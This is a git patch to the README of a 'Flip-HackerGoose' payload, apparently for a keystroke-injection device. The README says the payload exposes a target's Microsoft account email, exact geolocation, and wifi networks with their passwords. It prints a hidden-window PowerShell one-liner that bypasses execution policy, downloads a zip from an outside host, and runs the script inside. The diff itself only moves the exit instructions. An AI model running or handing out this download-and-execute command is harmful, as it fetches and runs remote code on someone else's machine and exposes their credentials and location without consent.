From c2d8cddfb7060f5d7e5243ce635beb27c3da32ae Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 26 Dec 2022 11:59:25 -0600 Subject: [PATCH] Update ReadMe.md --- Payloads/Flip-HackerGoose/ReadMe.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-HackerGoose/ReadMe.md b/Payloads/Flip-HackerGoose/ReadMe.md index 93cb40e..4707824 100644 --- a/Payloads/Flip-HackerGoose/ReadMe.md +++ b/Payloads/Flip-HackerGoose/ReadMe.md @@ -27,10 +27,6 @@ Afterwards it will walk around your targets screen pulling out personal informat * Email associated with their microsoft account * Their exact Geo Location * The wifi networks and passwords - -This payload will automatically end after 2 min - -Or if you press `Left Control` + `Right Control` at the same time ## Getting Started @@ -48,6 +44,11 @@ Or if you press `Left Control` + `Right Control` at the same time ``` powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1" ``` +### Exiting the Payload + +This payload will automatically end after 2 min + +Or if you press `Left Control` + `Right Control` at the same time

(back to top)